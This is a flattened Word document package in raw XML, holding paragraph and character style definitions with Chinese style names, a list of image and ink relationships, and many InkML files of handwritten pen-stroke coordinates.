    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="15">
    <w:name w:val="comment"/>
    <w:basedOn w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="标题 字符"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.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52.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink25.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink24.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink23.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink22.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink21.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink20.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink19.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink18.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink17.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink16.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink15.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink14.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink13.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink12.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink11.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink10.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink9.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink8.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink7.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink6.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink5.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink4.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink3.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink2.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink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67918726801872" units="cm"/>
      <inkml:brushProperty name="height" value="0.0167918726801872" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">47400 1.2704e+06 582,'-27'3'0,"-3"6"0,-3 7 0,-2 6 0,0 7 2,7 10-1,6 10-1,7 9 1,0 15 0,-2 22-1,-3 22 1,-3 23-2,-4 14-2,-3 10-2,-3 10 5,-2 9 1,-9 17-1,-12 25 0,-13 25 0,-12 25 0,-18 32 0,-21 42 1,-22 40-2,-22 41 1,-19 32 0,-16 26-2,-15 24 4,-15 26-4,-4 1 4,9-22-3,10-22 1,10-21 1,14-31-1,23-36 1,22-39 1,22-36-3,15-39 0,9-36 3,10-39-5,10-36 5,8-26-2,10-12-2,10-13 2,9-12 0,17-43-2,25-71-3,25-72 5,25-72 0,14-38 9,3-3 0,3-3-9,4-2 0,-4 11-2,-9 29-2,-10 28 4,-8 28 2</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink1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51608847081661" units="cm"/>
      <inkml:brushProperty name="height" value="0.0151608847081661" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">45600 1.276e+06 644,'0'79'2,"0"10"-1,0 10-1,0 9 1,-4 32-1,-5 57 1,-7 56-1,-5 57 1,-8 46-6,-5 38 0,-7 37 6,-5 38-2,-3 9 3,4-19-2,3-18 1,3-19-2,4-43 1,7-65-2,6-65 4,7-66-3,0 13 2,-2 95 3,-3 93-6,-3 95 3,1 16-3,6-59 0,7-60 4,6-58-5,6-48 4,6-34-2,7-35 0,6-33 2,4-39 1,4-40 0,3-40-2,3-41 1,1-40-5,1-36 5,-1-39-3,1-36 3,-4-9 2,-6 22 3,-6 22-6,-6 23-2,-2 10 2,3 0-3,3 0 3,4 0 0,-1 0-2,-3 0 1,-3 0 2,-2 0-3</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink1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26208299770951" units="cm"/>
      <inkml:brushProperty name="height" value="0.0126208299770951" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">47650 1.27625e+06 774,'-49'25'0,"4"0"0,3 0 0,3 0 0,3-2 0,3-3 1,3-3-2,4-2 2,2-5-2,4-2 3,3-3-3,3-3 3,6-1-4,9 4 6,10 3-6,10 3 3,4-1-5,0-2 0,0-3 4,0-3 0,9 1 2,19 6 2,19 7-5,19 6 2,1 1-3,-16-3-1,-15-3 5,-15-2-4,4-3 4,25 1-2,25-1 0,25 1 0,1-3-1,-21-2 4,-22-3-5,-22-3 3,3-2-3,28 0 3,28 0-3,29 0 4,-1 0-3,-28 0 5,-28 0-7,-27 0 5,-5-5-6,23-9 2,22-10 1,22-8 0,-2-3 8,-25 7-2,-25 6-6,-25 7 2,-11 2-4,3 1-2,3-1 6,4 1 0,-4-1-1,-9 1 2,-10-1-2,-8 1 0</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink1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20308073237538" units="cm"/>
      <inkml:brushProperty name="height" value="0.0120308073237538" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">46950 1.27895e+06 812,'-72'48'0,"6"-3"0,7-3 0,6-2 0,7-6 0,10-6 0,10-6 0,9-6 0,7-6-1,7-2-1,6-3 2,7-3 1,10-2 2,16 0 5,15 0-11,17 0 5,16-2-6,19-3 3,19-3-1,19-2 4,-4-3-7,-24 1 3,-26-1 1,-24 1 2,-3-4-1,23-6 3,22-6-5,22-6 4,1-1-1,-19 7-1,-18 6 0,-19 7 1,3-3-2,25-8 0,25-10 1,25-9 0,0-2-1,-25 6 0,-25 7 0,-25 6 1,-2-1 3,22-5-3,22-7 1,23-5-2,-5-1 1,-27 6-1,-28 7 2,-28 6-2,-15 4 2,1 4 3,-1 3-5,1 3 1,-3-1-2,-2-2 1,-3-3-1,-3-3 4</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink1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1995549313724" units="cm"/>
      <inkml:brushProperty name="height" value="0.011995549313724" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">48200 1.27855e+06 815,'-24'48'0,"4"-3"0,3-3 0,3-2 0,-2 10 0,-6 25 0,-6 25 0,-6 25 0,-1 3 0,7-19 3,6-18-4,7-19 0,-1 7 2,-6 35-1,-6 35 1,-6 34-2,-10 31 1,-12 28-4,-13 28 7,-12 29-5,1-14 2,16-52-3,15-53 4,17-53-1,2-10 1,-9 34 2,-10 35-5,-8 35 4,0-4-3,14-41 2,11-40-3,14-40 4,3-9-5,-2 26 3,-3 24-2,-3 26 2,1-6 4,6-33-2,7-35-3,6-34 1,4-16-2,4 3-1,3 3 1,3 4 3,1-4 4,1-9-2,-1-10-2,1-8-2,4-8-3,9-2-2,10-3 7,10-3 0,-1-6 2,-9-5 5,-10-7-9,-8-5 0,-4-6 1,3-3-3,3-3 3,4-2 1</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink1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30186900496483" units="cm"/>
      <inkml:brushProperty name="height" value="0.0130186900496483" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">49750 1.27815e+06 751,'-44'46'-38,"13"-5"86,12-7-49,13-5 0,-1 10 3,-11 28-1,-14 28-3,-11 29 5,-3 7-14,10-12 6,10-13 4,9-12 1,-2 18 3,-12 51-1,-13 49 0,-12 51-5,-4 41 4,7 35-3,6 35 1,7 34 2,13-5-1,22-44 1,22-43 1,23-44-4,19-44 2,19-44-2,19-43 4,19-44-3,9-35 3,0-24-2,0-26 1,0-24-1,4-29 0,10-31-1,10-31 1,9-31 0,9-16 1,9 0-4,10 0 4,10 0-1,0 1 1,-5 4-1,-7 3 0,-5 3 0,-9 1-1,-9 1 2,-10-1-3,-8 1 2,-15 4 2,-19 9-3,-18 10 1,-19 10 0,-15 10 0,-8 13 2,-10 12-3,-9 13 1,-15 7 0,-18 4 1,-19 3-2,-18 3 1,-17 6-1,-11 9-1,-14 10 3,-11 10-3,-9 4 1,-3 0 1,-3 0-2,-2 0 4,8 1 3,22 4 1,22 3-4,23 3-4</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink1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32831074297428" units="cm"/>
      <inkml:brushProperty name="height" value="0.0132831074297428" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">54300 1.27865e+06 736,'-24'23'0,"4"-3"0,3-3 0,3-2 0,-1 0-1,-2 7-1,-3 6 4,-3 7-3,-1-1 2,4-6 3,3-6-7,3-6 6,3-2-2,3 3 2,3 3-3,4 4 1,2-1-8,4-3 3,3-3 2,3-2 3,7-1 3,14 3-4,11 3 2,14 4-2,0-1-4,-8-3 4,-10-3-2,-9-2 3,7-3 1,26 1 0,24-1-1,26 1-3,4-3 3,-16-2-4,-15-3 3,-15-3 1,5-6 0,29-5-1,28-7 0,28-5-1,-2-3 2,-31 4-2,-31 3-1,-31 3 4,-2-7-3,28-15 0,28-15 2,29-16-1,-1-2 1,-28 13 1,-28 12-1,-27 13-3,-8-5 2,17-22-6,15-22 7,16-21-1,-1-3 6,-15 20-4,-15 18 0,-16 20-3,-5 0-4,6-15 2,7-15 1,6-16 4,-4-1 1,-11 17 3,-14 15-7,-11 16 2,-7 5-4,0-2 3,0-3-1,0-3 1</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink1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23696587979794" units="cm"/>
      <inkml:brushProperty name="height" value="0.0123696587979794" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">57400 1.2748e+06 790,'-50'96'0,"0"-5"0,0-7 0,0-5 0,3-1 0,6 6 0,7 7 0,6 6 0,3 3 1,0 0 1,0 0-2,0 0 0,1-7-3,4-11 1,3-14 3,3-11-2,-4 18 3,-8 50 2,-10 50-5,-9 50 1,-2 6-2,6-37-1,7-38 3,6-37 0,-1 4 0,-5 47 3,-7 47-5,-5 48 4,-1 2-5,6-41 5,7-40-2,6-40-1,-1 0-1,-5 45 2,-7 43 1,-5 45-4,0-8 8,10-55-2,10-57-5,9-55 4,2-8-8,-2 45 5,-3 43-1,-3 45 2,1-3 3,6-46-1,7-47-1,6-47-3,3-21 4,0 7-2,0 6 1,0 7-2,-2-6 2,-3-15-1,-3-15 0,-2-16 0</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink1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45021714270115" units="cm"/>
      <inkml:brushProperty name="height" value="0.0145021714270115" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">54650 1.28235e+06 674,'-46'0'0,"10"0"0,10 0 0,9 0 0,1 0-2,-6 0 1,-6 0 0,-6 0 2,-1 1 4,7 4-1,6 3-4,7 3 0,4 1-2,3 1 2,3-1-1,4 1 1,7 1 0,13 3-3,12 3 5,13 4-2,12 1-3,13 0 1,12 0 2,13 0 0,-1-4 0,-11-5 0,-14-7 1,-11-5-2,8-4 2,32 0 2,31 0-5,32 0 2,-1-2 1,-31-3-2,-31-3 2,-31-2-3,-2-6 4,28-6-5,28-6 5,29-6-2,1-2 0,-25 3 1,-25 3 1,-25 4-4,3-6 1,31-11-3,32-14 4,31-11 1,-1-3 2,-30 10 0,-32 10-1,-30 9-3,2-7-5,38-21 2,37-22 2,38-22 4,-2-1 3,-41 23 0,-40 22-4,-40 22-2,-21 8 0,0-2 1,0-3-1,0-3 0</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink1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64740048348904" units="cm"/>
      <inkml:brushProperty name="height" value="0.0164740048348904" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">60050 1.27605e+06 593,'-22'45'0,"6"-9"1,7-10-1,6-8 0,3-4 0,0 3 2,0 3-3,0 4 2,6-3-1,13-5 2,12-7-3,13-5 1,2-4-4,-5 0-1,-7 0 6,-5 0-2,5-2 5,19-3-1,19-3-3,19-2 0,2-3-2,-11 1-1,-14-1 3,-11 1 0,7-3 2,28-2-1,28-3-1,29-3 0,1-1-1,-25 4 1,-25 3 0,-25 3 0,4-4 1,35-8-3,35-10 3,34-9 0,-2 1-3,-37 13 5,-38 12-5,-37 13 4,-12 2-5,17-5 6,15-7-5,16-5 4,-4-1-4,-21 6 3,-22 7-1,-22 6 1,-8 1-8,6-3 4,7-3 2,6-2 2,-7 3-1,-18 14-2,-19 11 4,-18 14-3</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink1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85723658651114" units="cm"/>
      <inkml:brushProperty name="height" value="0.0185723658651114" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">58750 1.2783e+06 526,'0'25'0,"0"0"0,0 0 0,0 0 0,0-2 1,0-3 2,0-3-5,0-2 3,1-3-2,4 1-2,3-1 3,3 1 1,1-1-2,1 1 2,-1-1-2,1 1 2,4-3-1,9-2 3,10-3-4,10-3 2,0-2-4,-5 0 0,-7 0 4,-5 0-1,10 0 2,28 0-1,28 0 0,29 0-1,2-2-3,-21-3 2,-22-3 1,-22-2-1,3-8 4,28-8-2,28-10 0,29-9-3,1-1 2,-25 10-1,-25 10 1,-25 9 0,3-1 0,31-8 1,32-10-2,31-9 2,-1-1-1,-30 10-1,-32 10 1,-30 9 1,0-2-1,35-12 1,35-13-3,34-12 5,-2-2-6,-37 9 4,-38 10 0,-37 10-4,-9 2 5,23-3-4,22-3 3,22-2-3,-1 0 6,-21 7-5,-22 6 2,-22 7 0,-5 4-3,13 3 2,12 3-1,13 4 3,-4 2-2,-18 4-1,-19 3 2,-18 3-1,-7 3-1,6 3 1,7 3 1,6 4-3,-2 1 3,-9 0-1,-10 0 0,-8 0 0,-6 3 0,1 6 1,-1 7-3,1 6 3,-3 1 0,-2-3-4,-3-3 4,-3-2 0,-2 5-3,0 16 5,0 15-5,0 17 2,-2 0 2,-3-11-4,-3-14 3,-2-11-1,-6 13 0,-6 41 1,-6 40-3,-6 42 4,-1 2-3,7-34 1,6-35 1,7-33-2,-4-3 2,-12 32-2,-13 31 3,-12 32-4,-1-1 2,14-31 0,11-31-1,14-31 0,0-4 5,-8 26-6,-10 24 5,-9 26-5,-1-3 1,10-27 0,10-28 2,9-28-1,1-4-2,-6 22 3,-6 22-2,-6 23 3,-1-6-3,7-31 2,6-31 0,7-31-1,0-13-3,-2 6 4,-3 7-2,-3 6 1,-4-4 0,-3-11 2,-3-14-4,-2-11 2,0-9 3,7-3-2,6-3-2,7-2 1,-1-9 0,-6-12-2,-6-13 2,-6-12 0,-1-2 1,7 9-1,6 10 0,7 10 1,-4-12-2,-12-31-1,-13-31 3,-12-31-1,-4-6 0,7 23 3,6 22-4,7 22 1,-1-7-1,-6-34-1,-6-35 1,-6-33 1,2-1 4,14 34-4,11 35 2,14 35-3,-1-3-1,-12-36-2,-13-39 6,-12-36-3,-1-4 3,14 31 2,11 32-4,14 31-1,3-12 0,-2-52-3,-3-53 5,-3-53 0,-1-6-1,4 45 5,3 43-8,3 45 5,3 22-2,3 4-3,3 3 6,4 3-4,-1 1-1,-3 1 3,-3-1-2,-2 1 1</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29533149302006" units="cm"/>
      <inkml:brushProperty name="height" value="0.0129533149302006" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">49100 1.2712e+06 754,'-2'-22'0,"-3"6"0,-3 7 0,-2 6 0,-5 7 0,-2 10 0,-3 10 0,-3 9 0,-7 15 5,-9 22 0,-10 22-6,-8 23 2,-11 24-10,-8 28-1,-10 28 11,-9 29-1,-4 7 4,4-12 1,3-13-5,3-12-1,10-24 1,20-34-1,18-35 1,20-33 0,2-14 0,-12 10 3,-13 10-5,-12 9 3,-4-2-13,7-12-1,6-13 12,7-12 3</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink20.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80792175233364" units="cm"/>
      <inkml:brushProperty name="height" value="0.0180792175233364" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">66850 1.2754e+06 540,'-54'1'0,"-5"4"0,-7 3 0,-5 3 0,-6 3 2,-3 3-3,-3 3 3,-2 4-2,5-1-1,16-3 4,15-3-5,17-2 4,14-5-6,17-2 3,15-3 0,16-3 2,21-2-2,29 0 1,28 0 2,28 0-5,17-4 5,6-5-4,7-7 3,6-5-2,-10-3 1,-24 4 0,-26 3-1,-24 3 2,2-1 0,32-2 0,31-3 0,32-3-1,-1-1-2,-31 4 2,-31 3-1,-31 3 1,12-8 2,56-19-1,57-18 0,56-19-3,12-5 1,-31 9 0,-31 10-1,-31 10 2,-31 8 4,-27 10-3,-28 10-1,-28 9 0,-13 4-3,3 1-4,3-1 10,4 1-4,-9 8 2,-18 20 4,-19 18-6,-18 20 1,-20 10 2,-18 3-1,-19 3-1,-18 4 0,-17 2 1,-11 4-2,-14 3 2,-11 3-3,0-5 6,17-12-2,15-13-3,16-12 3</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink2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83855649083853" units="cm"/>
      <inkml:brushProperty name="height" value="0.0183855649083853" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">66700 1.2767e+06 531,'-140'70'0,"23"-9"-1,22-10 2,22-8-1,18-8 2,16-2 3,15-3-7,17-3 4,16-4-6,19-3 0,19-3 5,19-2-2,12-6 2,6-6-1,7-6 0,6-6 0,-4-4-2,-11 1 2,-14-1 0,-11 1 0,5-4 1,26-6 1,24-6-2,26-6 0,1-1-2,-22 7 1,-22 6 2,-21 7-3,16-4 6,57-12-4,56-13 1,57-12-1,25-7-2,-2 1 0,-3-1 2,-3 1 1,-9 4-4,-11 9 0,-14 10 5,-11 10-4,-25 5 4,-33 4-2,-35 3-1,-34 3 2,-35 4-2,-34 7 0,-35 6 0,-33 7 2,-17 2 9,4 1-2,3-1-8,3 1 1,1-1-6,1 1 1,-1-1 3,1 1 3</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink2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80556867271662" units="cm"/>
      <inkml:brushProperty name="height" value="0.0180556867271662" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">66400 1.27835e+06 541,'-24'23'0,"4"-3"0,3-3 0,3-2 0,-1-3 0,-2 1 0,-3-1 0,-3 1 0,-2 1 1,0 3-2,0 3 3,0 4-2,9-3 1,19-5 4,19-7-5,19-5-1,5-4-4,-5 0-3,-7 0 9,-5 0-1,8 0 4,26 0-2,24 0 0,26 0-3,22-7-1,23-11 3,22-14-3,22-11 3,21-9-3,22-3 3,22-3-2,23-2 2,8-1-4,-3 3 5,-3 3-2,-2 4-2,-14 4 2,-21 6 0,-22 7-1,-22 6 1,-29 9-1,-33 13 1,-35 12-2,-34 13 4,-27 7 0,-19 4 0,-18 3 0,-19 3-3,-18 3 4,-15 3-1,-15 3-2,-16 4 1,-5-3-2,6-5 3,7-7-2,6-5-2</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink2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90895311534405" units="cm"/>
      <inkml:brushProperty name="height" value="0.0190895311534405" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">66400 1.2802e+06 512,'-60'54'-1,"-18"10"1,-19 10-1,-18 9 2,-4 4 2,13 1 1,12-1-5,13 1 1,18-9 0,26-15-2,24-15 1,26-16 2,21-12-3,19-5-1,19-7 4,19-5-2,18-8 4,19-5-5,19-7 5,19-5-6,13-9 5,10-9-5,10-10 4,9-8-1,13-9 0,20-6 0,18-6 2,20-6-5,10-4 4,3 1-4,3-1 3,4 1 0,-9 2 0,-18 7 1,-19 6-2,-18 7 1,-26 7-1,-31 9-1,-31 10 2,-31 10 1,-27 4 0,-22 0 1,-22 0-2,-21 0 0,-17 1 4,-8 4 0,-10 3-3,-9 3-1,-5 1-2,0 1 1,0-1 2,0 1-2</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink2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2237962000072" units="cm"/>
      <inkml:brushProperty name="height" value="0.02237962000072" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">68800 1.27765e+06 436,'1'-16'51,"4"19"-106,3 19 53,3 19 4,1 21-1,1 26 2,-1 24-3,1 26-1,-6 30 1,-8 39-1,-10 36 0,-9 39 1,-15 16 1,-18-3 0,-19-3-2,-18-2 0,-15-3 4,-9 1-6,-10-1 4,-8 1 0,-6-9-2,1-15-2,-1-15 6,1-16-6,8-18 5,20-18-4,18-19 2,20-18 0,13-14 2,9-5-1,10-7-1,10-5 0,7-17-1,6-24 1,7-26 0,6-24 0,3-35 1,0-44 1,0-43-1,0-44-2,1-12 5,4 23-1,3 22-3,3 22 0</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink2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98240261524916" units="cm"/>
      <inkml:brushProperty name="height" value="0.0198240261524916" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
